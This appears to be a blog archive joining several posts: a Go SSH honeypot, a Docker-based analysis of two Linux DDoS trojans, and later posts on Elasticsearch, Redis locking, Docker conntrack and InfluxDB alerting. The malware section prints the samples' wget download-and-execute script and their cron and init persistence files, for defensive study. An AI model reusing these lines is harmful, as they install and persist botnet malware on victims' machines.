20		go handleChannels(chans, sshConn.Permissions)
21	}

On line 18 we just log out of band requests that aren’t what we want. Line 20 handles the meat and potatoes of our programs which is incoming commands and SOCKS proxy requests. We do both of these in go routines so multiple clients can connect at once.

The next important step is handling both out of band requests and incoming TPC connections - jump to the end of the codelbock for an explanation.

  1func handleChannels(chans <-chan ssh.NewChannel, perms *ssh.Permissions) {
  2	// Service the incoming Channel channel.
  3	for newChannel := range chans {
  4		channel, requests, err := newChannel.Accept()
  5		if err != nil {
  6			log.Printf("could not accept channel (%s)", err)
  7			continue
  8		}
 10		var shell string
 11		shell = os.Getenv("SHELL")
 12		if shell == "" {
 13			shell = DEFAULT_SHELL
 14		}
 16		if newChannel.ChannelType() == "direct-tcpip" {
 17			term := terminal.NewTerminal(channel, "")
 18			go HandleTcpReading(channel, term, perms)
 19		}
 21		// Sessions have out-of-band requests such as "shell", "pty-req" and "env"
 22		go func(in <-chan *ssh.Request) {
 23			for req := range in {
 24				term := terminal.NewTerminal(channel, "")
 25				handler := NewCommandHandler(term)
 26				handler.Register(&Ls{}, &LsAl{},
 27					&Help{},
 28					&Pwd{},
 29					&UnsetHistory{},
 30					&Uname{},
 31					&Echo{},
 32					&Whoami{User: "root"},
 33				)
 35				log.Printf("Payload: %s", req.Payload)
 36				ok := false
 37				switch req.Type {
 38				// exec is used: ssh [email protected] 'some command'
 39				case "exec":
 40					ok = true
 41					command := string(req.Payload[4 : req.Payload[3]+4])
 43					cmdOut, newLine := handler.MatchAndRun(command)
 44					term.Write([]byte(cmdOut))
 45					if newLine {
 46						term.Write([]byte("\r\n"))
 47					}
 49					shellCommand := &ShellCommand{Cmd: command, Guid: perms.Extensions["guid"]}
 50					go shellCommand.Save()
 52					channel.Close()
 53				// shell is used: ssh [email protected] ... then commands are entered
 54				case "shell":
 55					for {
 56						term.Write([]byte("[email protected]:/# "))
 57						line, err := term.ReadLine()
 58						if err == io.EOF {
 59							log.Printf("EOF detected, closing")
 60							channel.Close()
 61							ok = true
 62							break
 63						}
 64						if err != nil {
 65							log.Printf("Error: %s", err)
 66						}
 68						cmdOut, newLine := handler.MatchAndRun(line)
 69						term.Write([]byte(cmdOut))
 70						if newLine {
 71							term.Write([]byte("\r\n"))
 72						}
 74						shellCommand := &ShellCommand{Cmd: line, Guid: perms.Extensions["guid"]}
 75						go shellCommand.Save()
 77						log.Println(line)
 78					}
 79					if len(req.Payload) == 0 {
 80						ok = true
 81					}
 82				case "pty-req":
 83					// Responding 'ok' here will let the client
 84					// know we have a pty ready for input
 85					ok = true
 86					// Parse body...
 87					termLen := req.Payload[3]
 88					termEnv := string(req.Payload[4 : termLen+4])
 89					log.Printf("pty-req '%s'", termEnv)
 90				default:
 91					log.Printf("[%s] Payload: %s", req.Type, req.Payload)
 92				}
 94				if !ok {
 95					log.Printf("declining %s request...", req.Type)
 96				}
 98				req.Reply(ok, nil)
 99			}
100		}(requests)
101	}

On line 16 we’re sending the TCP reading off to another function to get handled - the rest of the requests coming in out-of-band will be handled in the function on line 22.

On line 24 we use the terminal package to create a new terminal for reading input and sending output back to the user. Line 25 is our command handler which will do the regex and pattern matching.

Our case/switch statement is doing the heavy lifting here starting on line 39.

Now we need to understand the different types of SSH connections and requests that can be made:

  • (line 16) direct-tcpip is what happens when you use your SSH connection to proxy TCP connections (like a SOCKS proxy).

  • (line 39) exec is what happens when you run commands like ssh some [email protected] ‘ls -al’

  • (line 54) shell is what happens when you actually login and start executing commands, a PTY gets launched and you have an interactive command prompt.

  • (line 82) pty-req lets the SSH client know that its ready to accept input (works in conjunction with shell).

These are all the command types we care about for now.

Simulating Commands

A few things we need to keep in mind for this part of the honeypot:

  • Need to simulate commands that are run by attackers
  • Go’s interface pattern fits well here
  • Need to understand command return values
    • Does the command return a new line?
    • If output doesn’t match (including new lines) it may throw off bots/scripts that check for exact output matching
  • Need to be able to match commands based on regex or equality
    • Needs to handle commands like:
      • echo -n test
      • echo test
      • echo foo bar baz
    • Don’t want to write a handler for each variation of a command with flags - would never cover all cases

So with all that in mind lets lay out a framework for the command handler. We need something to register all of our commands, and then a structure for our commands to be run consistently.

 1type CommandHandler struct {
 2	Terminal *terminal.Terminal
 3	Commands []Command
 6func NewCommandHandler(term *terminal.Terminal) *CommandHandler {
 7	return &CommandHandler{Terminal: term, Commands: []Command{}}
10func (ch *CommandHandler) Register(commands ...Command) {
11	for _, c := range commands {
12		ch.Commands = append(ch.Commands, c)
13	}
16func (ch *CommandHandler) MatchAndRun(in string) (string, bool) {
17	for _, c := range ch.Commands {
18		if c.Match(strings.TrimSpace(in)) {
19			return c.Run(in)
20		}
21	}
22	return fmt.Sprintf("bash: %s: command not found", in), false
25type Command interface {
26	Match(string) bool
27	Run(string) (string, bool)
30type Echo struct{}
32func (c *Echo) Match(in string) bool {
33	return strings.Contains(in, "echo")
36func (c *Echo) Run(in string) (string, bool) {
37	x := strings.Split(in, " ")
38	newLine := true
39	if len(x) >= 2 {
40		if x[1] == "-n" {
41			newLine = false
42		}
43	}
44	if len(x) == 1 {
45		return "", true
46	}
47	startPos := 1
48	if strings.Contains(x[1], "-") {
49		if len(x) >= 2 {
50			startPos = 2
51		}
52	}
54	return strings.Join(x[startPos:len(x)], " "), newLine

On lines 1 and 6 we’re creating our CommandHandler which will be where all commands get registered to and where we store our terminal to write to.

Line 10 lets us register 1...n commands at once using go’s variadic argument syntax.

Line 16 is our runner that will take in the input from attacker and run it through our registered commands. We return the command output and also whether or not it will output a newline at the end. If no command is registered that will match, we return the generic bash command not found.

Line 25 is our interface definition. We have two functions, Match and Run. Run follows the MatchAndRun pattern where we returns the command output and whether or not a newline is needed. The meat of this command can do wahtever you want it to do - in this case we’re checking for some specific flags that I’ve seen used on the honeypot and parsing them out.

The Match portion in this case is just a simple Contains check - you can do whatever you want in this portion - it just needs to return a boolean. Go nuts with regexes or just do a simple equality check.

Persistence Layer

For our persistence layer their isn’t anything special going on. We have a few configurable options via ENV vars, ability to skip sending commands to the remote, and ability to provide a SERVER_URL to dev against the local rails application.

Now that we have a working honeypot that is able to accept logins, simulate and record commands, we can start analyzing dropped files.

Analyzing Dropped Files

Tools we’ll be using from OS X (please note this is not exhaustive):

  • Virtualbox
  • Docker (docker-machine on OS X)
  • Wireshark
  • VirusTotal

We’re going to use wireshark to process PCAP files generated by Wireshark, so we’ll need to tell VirtualBox to create the network capture:

1/Applications/VirtualBox.app/Contents/MacOS/VBoxManage modifyvm default --nictrace1 on --nictracefile1 /tmp/log.pcap

You may need to stop the docker container for this command to generate pcap files

We can exec into the container to check running processes and see other commands being run.

We’ll be using docker to dump a clean image and an infected image, in order to see what files were modified and/or dropped onto the file system:

1docker export container_id > container.tar
2tar xvf container.tar -C container-dump

What you want to do in order to get a clean a dump as possible:

  • Run a plain ubuntu container docker run -it ubuntu bash to get into it and at the console
  • Run any commands you want (like apt-get update or apt-get install wget or whatever other tools you think you will need)
  • Save the “comparison” container using docker export then extract it into a folder

Now when running the malware (assuming its in the current directory):

1docker run -it --volume=`pwd`:/malware:ro ubuntu bash

Repeat the same commands you ran above in the “comparison” container (or save it as an image and spawn from that).

Now you can exec into your container and run the malware. Depending on how comfortable you are with monitoring your own network you should be doing this on an isolated network. Now to running the two malware samples we’ll be going over today:


Common name: HEUR:Trojan-DDoS.Linux.Xarcen.a
sha256: acbccef76341af012bdf8f0022b302c08c72c6911631f98de8d9f694b3460e25
md5: 63f286aa32a4baaa8b0dd137eb4b3361

Initial look:

  • C&C trojan
  • Drops multiple copies of itself
  • Will randomly spawn processes and change process names

Process output

 1[email protected]:/malware# ps ax
 3    1 ?        Ss     0:00 bash
 4   21 ?        Ssl    0:00 netstat -antop
 5   72 ?        Ss     0:00 bash
 6   75 ?        Ss     0:00 pwd
 7   78 ?        Ss     0:00 route -n
 8   80 ?        Ss     0:00 grep "A"
 9   81 ?        Ss     0:00 whoami
10   93 ?        Ss     0:00 cat resolv.conf
11   96 ?        Ss     0:00 whoami
12   99 ?        R+     0:00 ps ax
13  100 ?        Ss     0:00 su
14  102 ?        R      0:00 /usr/bin/nnqucjsvsp who 21
15[email protected]:/malware# ps ax
17    1 ?        Ss     0:00 bash
18   21 ?        Ssl    0:00 netstat -antop
19   93 ?        Ss     0:00 cat resolv.conf
20   96 ?        Ss     0:00 whoami
21  100 ?        Ss     0:00 su
22  102 ?        Ss     0:00 who
23  103 ?        Ss     0:00 id
24  104 ?        R+     0:00 ps ax
25[email protected]:/malware# ps ax
27    1 ?        Ss     0:00 bash
28   21 ?        Ssl    0:00 netstat -antop
29   93 ?        Ss     0:00 cat resolv.conf
30   96 ?        Ss     0:00 whoami
31  100 ?        Ss     0:00 su
32  102 ?        Ss     0:00 who
33  103 ?        Ss     0:00 id

Network Traffic

 1Frame 523: 271 bytes on wire (2168 bits), 271 bytes captured (2168 bits)
 2Ethernet II, Src: CadmusCo_26:3d:b9 (08:00:27:26:3d:b9), Dst: RealtekU_12:35:02 (52:54:00:12:35:02)
 3Internet Protocol Version 4, Src:, Dst:
 4Transmission Control Protocol, Src Port: 39433 (39433), Dst Port: 80 (80), Seq: 1, Ack: 1, Len: 217
 5Hypertext Transfer Protocol
 6    GET /config.rar HTTP/1.1\r\n
 7        [Expert Info (Chat/Sequence): GET /config.rar HTTP/1.1\r\n]
 8        Request Method: GET
 9        Request URI: /config.rar
10        Request Version: HTTP/1.1
11    Accept: */*\r\n
12    Accept-Language: zh-cn\r\n
13    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)\r\n
14    Host: aa.hostasa.org\r\n
15    Connection: Keep-Alive\r\n
16    \r\n
17    [Full request URI: http://aa.hostasa.org/config.rar]
18    [HTTP request 1/1]
19    [Response in frame: 537]

Dropped Files

2 binaries were dropped onto the file system, which looked to be copies of itself:

  • g7hs-dump/usr/bin/filupxsndj
    • sha256: 3657bd42fef97343c78a199d3611285e6fe7b88cc91e127d17ebbbbb2fd2f292
    • Common name: HEUR:Trojan-DDoS.Linux.Xarcen.a
  • g7hs-dump/lib/libudev.so
    • sha256: acbccef76341af012bdf8f0022b302c08c72c6911631f98de8d9f694b3460e25
    • Common name: HEUR:Trojan-DDoS.Linux.Xarcen.a

Several other plain text files were dropped in order to ensure startup:


3for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
4cp /lib/libudev.so /lib/libudev.so.6


1*/3 * * * * root /etc/cron.hourly/gcc.sh


 2# chkconfig: 12345 90 90
 3# description: filupxsndj
 5# Provides:            filupxsndj
 6# Required-Start:
 7# Required-Stop:
 8# Default-Start:      1 2 3 4 5
 9# Default-Stop:
10# Short-Description:  filupxsndj
13case $1 in
15      /usr/bin/filupxsndj
16      ;;
18      ;;
20      /usr/bin/filupxsndj
21      ;;
















So we can see several things going on: dropped files, additional payload downloads, tries to persist itself in as many places as possible, masks its presence with different process names. These two pieces of malware were the first ones I’ve analyzed (ever) so I don’t have much indepth analysis other than what I was able to gather from network traffic and observations through docker. For a more detailed write up Kaspersky has a great writeup, including reversed source code.

DDOS.Flood / DnsAmp

Common name: DDOS.Flood / DnsAmp
sha256: d9d58fb1f562e7c22bb67edf9dc651fa8bc823ff3e8aecc04131c34b5bc8cf03
md5: b589c8a722b5c35d4bd95487b47f8b8b

Initial look:

  • Initial payload is a shell script
  • Another DDOS type malware
  • Drops several binaries that cover as many architectures as possible (ARM/MIPS/etc)
  • Masks itself as system interrupt process (irq)
  • Uses IRC + HTTP for communication
  • Connects to 2 IPs:
    • Running on AWS, most likely compromised.
    • Running somewhere in Australia.
  • Initial payload is a bash script

Dropped Files

Initial Payload

 2wget -c -P /var/run && chmod +x /var/run/tty0 && /var/run/tty0 &
 3wget -c -P /var/run && chmod +x /var/run/tty1 && /var/run/tty1 &
 4wget -c -P /var/run && chmod +x /var/run/tty2 && /var/run/tty2 &
 5wget -c -P /var/run && chmod +x /var/run/tty3 && /var/run/tty3 &
 6wget -c -P /var/run && chmod +x /var/run/tty4 && /var/run/tty4 &
 7wget -c -P /var/run && chmod +x /var/run/tty5 && /var/run/tty5 &
 8wget -c && chmod +x pty && ./pty &
 9wget -c -P /var/run && chmod +x /var/run/pty && /var/run/pty &
10rm -rf /var/run/1sh


1# DO NOT EDIT THIS FILE - edit the master and reinstall.
2# (/var/run/.x001804289383 installed on Tue May 17 21:20:29 2016)
3# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
4* * * * * /run/pty > /dev/null 2>&1 &

Network Traffic

Port 8080

 1Frame 4660: 556 bytes on wire (4448 bits), 556 bytes captured (4448 bits)
 2Ethernet II, Src: RealtekU_12:35:02 (52:54:00:12:35:02), Dst: CadmusCo_26:3d:b9 (08:00:27:26:3d:b9)
 3Internet Protocol Version 4, Src:, Dst:
 4Transmission Control Protocol, Src Port: 8080 (8080), Dst Port: 46783 (46783), Seq: 17, Ack: 85, Len: 502
 5Hypertext Transfer Protocol
 6    :[email protected] PRIVMSG x86|x|0|344265|a31f446d :\001VERSION\001\r\n
 7    :izu.ko 001 x86|x|0|344265|a31f446d :\n
 8    :izu.ko 002 x86|x|0|344265|a31f446d :\n
 9    :izu.ko 003 x86|x|0|344265|a31f446d :\n
10    :izu.ko 004 x86|x|0|344265|a31f446d :\n
11    :izu.ko 005 x86|x|0|344265|a31f446d :\n
12    :izu.ko 005 x86|x|0|344265|a31f446d :\n
13    :izu.ko 005 x86|x|0|344265|a31f446d :\n
14    :izu.ko 375 x86|x|0|344265|a31f446d :\n
15    :izu.ko 372 x86|x|0|344265|a31f446d :- 27/10/2014 11:36\r\n
16    :izu.ko 372 x86|x|0|344265|a31f446d :- !!\r\n
17    :izu.ko 376 x86|x|0|344265|a31f446d :\n
19Frame 4665: 257 bytes on wire (2056 bits), 257 bytes captured (2056 bits)
20Ethernet II, Src: RealtekU_12:35:02 (52:54:00:12:35:02), Dst: CadmusCo_26:3d:b9 (08:00:27:26:3d:b9)
21Internet Protocol Version 4, Src:, Dst:
22Transmission Control Protocol, Src Port: 8080 (8080), Dst Port: 46783 (46783), Seq: 519, Ack: 393, Len: 203
23Hypertext Transfer Protocol
24    :x86|x|0|344265|[email protected] JOIN :#x86\r\n
25    :izu.ko 332 x86|x|0|344265|a31f446d #x86 :https://www.youtube.com/watch?v=dDp3lfE_In8\r\n
26    :izu.ko 333 x86|x|0|344265|a31f446d #x86 Jorgee 1463456542\r\n


I can see several things happening here, the most interesting I think is the multiple architecture support - perhaps trying to compromise routers and other smaller IoT devices that are running ARM or other mobile processors. It tries to mask itself as a pty process and then installs itself in crontab. Finally it does some communication over IRC in plain text. Based on the limited network communication I saw, I’m guessing this might belong to a Spanish hacker group (from the youtube link) - or it might just be a coincidence of what I saw while executing the malware.

Building the Honeypot Network

Finding cheap hosts is important, we don’t care about a lot of the niceties we’d normally want in a VPS provider or cloud provider (like DO or AWS) - what we want is a cheap isolated environment to run our honeypots in (either cheaper kvm/xen, or even cheaper openvz). To that end, serverbear.com is great for simple price comparison shopping.

I currently am still trying to find the best locations and providers to use but have a mix of OpenVZ and KVM instances running. The main OS is Ubuntu, however any flavor of linux will do since the go binary will be compatible on any of them.

And finally, in order to get the best representation of activity, it’s best to spread the servers out globally so you can get a wide geographic coverage (Europe, America, Asia, etc).

Future plans

  • Payload downloading
    • Download the payloads as they get ‘executed’ on the honeypot
  • Automate analysis
    • Automate using docker and other tools to produce reliable analysis output
  • More honeypots
    • Right now I’m only running 6 - each is about $2-5/month
  • Automate WHOIS lookups
    • Automate abuse complaint sends and track which providers are actually monitoring and care about what their networ is used for
  • More services
    • Expand honeypot protocols to FTP, HTTP Proxies (Polipo, Squid, etc), etc

Performance before and after Optimizations

When working with billions of documents in your Elasticsearch cluster, there are a few important things to keep in mind:

  • Look at what the big players do (Elasticsearch/Kibana) for organization and planning
  • Experiment with index sizes that make sense for your business, don’t just assume 1 index for a billion documents is a good idea (even if you N shards)
  • Understand which metrics to monitor when you are performance testing your cluster
  • Monitor all points of ingestion: Elasticsearch, Load balancers (ELB, HAProxy, etc), and your application code that is inserting

What do the big players do?

Split by date ranges. Based on your data, decide whether daily, weekly, or even monthly splits are best for your dataset. Elasticsearch reccomends not going over 30-32G per shard based on current JVM memory reccomendations. The reason they reccomend to stay below 32G of ram per shard is that after that, the JVM will use uncompressed pointers which means internal pointers go from 4 bytes to 8 bytes, which (depending on your memory size) can lead to decreased heap available and also increased GC times from the JVM.

Don’t allocate more than 50% of your system memory for the JVM. Your kernel will cache files and help keep performance up. Over-allocating the JVM can lead to poor performance from the underlying engine, Lucene, which relies on the OS cache as well as the JVM to do searches.

Understand your users: other devs, other systems, etc. Don’t do deep pagination instead, use scan and scroll. Turn on slow logging to find any queries doing this or returning to many points of data per query.

Index Sizing and Memory

Keeping in mind the 30-32G per shard reccomendation, this will determine the number of shards per dataset. Remember shards are not modifiable but replicas are. Shards will increase indexing performance, while replicas will increase search performance.

Overwhelmed and can’t figure out what to do? Just start with an index and see how things go. Using alias’s you can create another index later on and map both of them together for searching (and eventually delete the old one if the data expires). If you start out with alias’s being used, transitions can be seemless (no need to redeploy to point to the new alias/index name).

Metrics to monitor

Use the plugin community to monitor your cluster: ElasticHQ, BigDesk, Head and Paramedic.

Watch for refresh/merge/flush time (ElasticHQ makes this available under Node Diagnostics). For example, with a large index (1TB) that has frequent updates or deletions, in order for the data to actually be freed from the disk and cluster fully, a merge must be performed. When the number of segments in a cluster gets to large, this can cause issues for refreshing and merging.

The basic idea is the larger your index, the more segments, and the more optimization steps that need to be performed. Automatic flushes happen every few seconds so more segments get created - as you can imagine this gets compounded the larger your index is. You can see a full rundown of how deleting and updating works in the documentation.

By seperating our indexes into smaller datasets (by day, week, or month) we can eliminate some of the issues that pop up. For example, a large number of segments can cause search performance issues until an optmize command is run (which in itself can cause high IO and make your search unavailable). By reducing the data we reduce the time these operations can take. We also end up at a point where no new data is inserted into the old indexes, so no further optimizations need to be done on them, only new indexes. Any acitivity on the old indexes then should only be from searching and will reduce the IO requirements from the cluster for those shards/indexes.

This also greatly simplifies purging old data. Instead of having to have the cluster do merges and optimizations when we remove old documents, we can just delete the old indexes and remove them from the aliases. This will also reduce the IO overhead on your cluster.

Monitoring Ingestion

Watch your ELB response time - is it spiking? Check flush, merge, and indexing times.

Add logging to your posts to understand how long each bulk insert is taking. Play with bulk sizes to see what works best for your document/datasize.

When moving from a single large index to aliased indexes, insertion times went from 500ms-1.5s+ to 50ms on average. Our daily processes that were taking half a day to complete, finishing in less than 15 minutes.

Processing 5k log lines per minute? Now we’re processing over 6 million.

Taking the time to understand your database and how each part of it works can be worth the effort especially if you’re looking for performance gains.

If you’ve done any concurrency work in Go you’ve used WaitGroups. They’re awesome!

Now lets say you have a bunch of workers that do some stuff, but at some point they all need to hit a single API that your rate limited against.

You could move to just using a single process and limiting it that way, but that doesn’t scale out very well.

While there are quite a few distributed lock libraries in Go, I didn’t find any that worked similarly to WaitGroups, so I set out to write one.

( If you just want the library, head on over to Github https://github.com/joshrendek/redis-rate-limiter )

Design goals:

  • Prevent deadlocks
  • Hard limit on concurrency (dont accidentally creep over)
  • Keep it simple to use
  • Use redis
  • Keep the design similar to sync.WaitGroup by using Add() and Done()

Initially I started off using INCR/DECR with WATCH. This somewhat worked but was causing the bucket to over-flow and go above the limit I defined.

Eventually I found the SETNX command and decided using a global lock with that around adding was the way to go.

So the final design goes through this flow for Add():

  1. Use SETNX to check if a key exists; loop until it doesn’t error (aka the lock is available for acquiring)
  2. Immediately add an expiration to the lock key once acquired so we don’t deadlock
  3. Check the current number of workers running; wait until it is below the max rate
  4. Generate a uuid for the worker lock, use this to SET a key and also add to a worker set
  5. Set an expiration on the worker lock key based on uuid so the worker doesn’t deadlock
  6. Unlock the global lock from SETNX by deleting the key
  7. Clean old, potentially locked workers

Removing is much simpler with Done():

  1. Delete the worker lock key
  2. Remove the worker lock from the worker set

For (1) we want to make sure we don’t hammer Redis or the CPU - so we make sure we can pass an option for a sleep duration while busy-waiting.

(2) Prevents the global lock from stalling out if a worker is cancelled in the middle of a lock acquisition.

Waiting for workers in (3) is done by making sure the cardinanality ( SCARD ) of the worker set is less than the worker limit. We loop and wait until this count goes down so we don’t exceed our limit.

(4) and (5) uses a UUID library to generate a unique id for the worker lock name/value. This gets added via SADD to the wait group worker set and also set as a key as well. We set a key with a TTL based on the UUID so we can remove it from the set via another method if it no longer exists.

(6) frees the global lock allowing other processes to acquire it while they wait in (1).

To clear old locks in (7) we need to take the members in the worker set and then query with EXISTS to see if the key still exists. If it doesn’t exist but it is still in the set, we know something bad happened. At this point we need to remove it from the worker set so that the slot frees up. This will prevent worker deadlocks from happening if it fails to reach the Done() function.

The Add() function returns a UUID string that you then pass to Done(uuid) to remove the worker locks. I think this was the simplest approach for doing this however if you have other ideas let me know!

That’s it! We now have a distributed wait group written in go as a library. You can see the source and how to use it over at https://github.com/joshrendek/redis-rate-limiter.

You’ve raised your file descriptor limits, updated security limits, tweaked your network settings and done everything else in preperation to launch your shiny new dockerized application.

Then you have performance issues and you can’t understand why, it looks to be network related. Alright! Let’s see what’s going on:

1ping google.com
2unknown host google.com

Maybe its DNS related…. Let’s try again:

2ping: sendmsg: Operation not permitted

That’s odd, maybe it’s a networking issue outside of our servers. Lets try pinging another host on the subnet:

2ping: sendmsg: Operation not permitted

That’s even more odd, our other host isn’t having network issues at all. Lets try going the other way:

1ping # the bad host
2# Lots of packet loss

We’re getting a lot of packet loss going from Host B to Host A (the problem machine). Maybe it’s a bad NIC?

Just for fun I decided to try and ping localhost/

2ping: sendmsg: Operation not permitted

That’s a new one. What the heck is going on? Now at this point I derped out and didn’t think to check dmesg. Lets assume you went down the road I went and derped.

What’s the different between host A and B? Well, host B doesn’t have docker installed!

 1apt-get remove docker-engine; reboot
 3# .... wait for reboot
 6# working
 8# working
 9ping google.com
10# working
1apt-get install docker-engine
3ping: sendmsg: Operation not permitted
6ping: sendmsg: Operation not permitted

Okay so it happens when docker is installed. We’ve isolated it. Kernel bug maybe? Queue swapping around kernels and still the same issue happens.

Fun side note: Ubuntu 14.04 has a kernel bug that prevents booting into LVM or software raided grub. Launchpad Bug

Switching back to the normal kernel (3.13) that comes with 14.04, we proceed. Docker bug? Hit up #docker on Freenode. Someone mentions checking dmesg and conntrack information.

Lo-and-behold, dmesg has tons of these:

1ip_conntrack: table full, dropping packet
2# x1000

How does docker networking work? NAT! That mean’s iptables needs to keep track of all your connections, hence the full message.

If you google the original message you’ll see a lot of people telling you to check your iptables rules and ACCEPT/INPUT chains to make sure there isn’t anything funky in there. If we combine this knowledge + the dmesg errors, we now know what to fix.

Lets update sysctl.conf and reboot for good measure ( you could also apply them with sysctl -p but I wanted to make sure everything was fresh. )

1net.ipv4.netfilter.ip_conntrack_tcp_timeout_established = 54000
2net.netfilter.nf_conntrack_generic_timeout = 120
3net.netfilter.nf_conntrack_max = 556000

Adjust the conntrack max until you hit a stable count (556k worked well for me) and don’t get anymore connection errors. Start your shiny new docker application that makes tons of network connections and everything should be good now.

Hope this helps someone in the future, as Google really didn’t have a lot of useful information on this message + Docker.

Influx Alert

Oct 12, 2015 - 2 minutes

I’ve been very happy using InfluxDB with Grafana + StatsD but always wanted a nice way to alert on some of the data being fed into statsd/grafana so I wrote a little tool in Go to accomplish that:

Github: https://github.com/joshrendek/influx-alert

I hope someone finds this useful! It’s got a few simple functions/comparisons done already and support for HipChat and Slack notifications.


Influx Alert

This is a tool to alert on data that is fed into InfluxDB (for example, via statsd) so you can get alerted on it.

How to get it

Go to releases, or download the latest here: v0.1

How to Use

  • name: the name of the alert ( will be used in notifier )
  • interval: how often to check influxdb (in seconds)
  • timeshift: how far back to go (query is like: where time > now() - TIMESHIFT
  • limit: the max number of results to return
  • type: influxdb (the only option for now)
  • function: min/max/average are the only supported functions for now
  • query: the influxdb query to run (omit any limit or where clause on the time)
  • trigger: the type of trigger and value that would trigger it
    • operator: gt/lt
    • value: value to compare against (note all values are floats internally)
  • notifiers: an array of notifiers, possible options are slack and hipchat

Example: ( see example.yml for more )

 1- name: Not Enough Foo
 2  type: influxdb
 3  function: average
 4  timeshift: 1h
 5  limit: 10
 6  interval: 10
 7  query: select * from "foo.counter"
 8  notifiers:
 9      - slack
10      - hipchat
11      - foobar
12  trigger:
13    operator: lt
14    value: 10

Environment Variables

 2  * INFLUX_PORT (8086 is default)
10  * HIPCHAT_SERVER (optional)
11  * DEBUG (optional)

Supported Notifiers

Supported Backends

  • InfluxDB v0.9